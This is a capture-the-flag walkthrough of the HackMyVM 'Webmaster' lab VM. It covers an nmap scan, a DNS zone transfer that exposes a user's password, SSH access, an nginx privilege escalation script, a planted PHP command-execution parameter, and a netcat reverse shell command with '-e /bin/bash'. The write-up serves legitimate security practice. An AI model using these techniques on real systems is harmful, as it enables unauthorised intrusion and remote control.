HackMyVM-Webmaster

Netdiscover

NMAP

Nmap scan report for 192.168.1.131                                                                                                            [4/84]
Host is up (0.000055s latency).
Not shown: 997 closed ports                                                                                                                         
PORT   STATE SERVICE VERSION                                              
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:                                                                                                                                      
|   2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
|   256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_  256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open  domain  (unknown banner: not currently available)
| dns-nsid: 
|_  bind.version: not currently available
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|     bind
|_    currently available
80/tcp open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/
submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=1/11%Time=5FFB65ED%P=x86_64-pc-linux-gnu%r(DNSV 
SF:ersionBindReqTCP,52,"\0P\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x 
SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x18\x17not\x20curren 
SF:tly\x20available\xc0\x0c\0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
MAC Address: 08:00:27:FE:8A:1A (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.04 seconds

PORT 80

Looking at the source

PORT 53

So this webmaster.hmv refers to a domain name let's add this to /etc/hosts.

Now by adding the domain name we are going to do a Zone transfer which is a DNS query type AXFR, is a type of DNS transaction.Zone transfers are typically used to replicate DNS data across a number of DNS servers or to back up DNS files.

We got john's passwords so now let's ssh into the machine.

By running sudo -l we can see what can we run as root user

We can find an LPE (Local Privilege Escalation) for nginx

Let’s download this to our machine and transfer it to target machine

To run this we need to provide the path of nginx error log which is located at /var/log/nginx/error.log

Run this like ./40768.sh /var/log/nginx/error.log

But we couldn’t run the exploit has it is needed to be run as www-data so only thing I could thing was to change the contents of one of the webserver files and insert a simple php GET paramter vulnerable code which will allow us to execute commands

Then you can just do nc your_ip your_netcat_port -e /bin/bash on cmd paramter to get reverse shell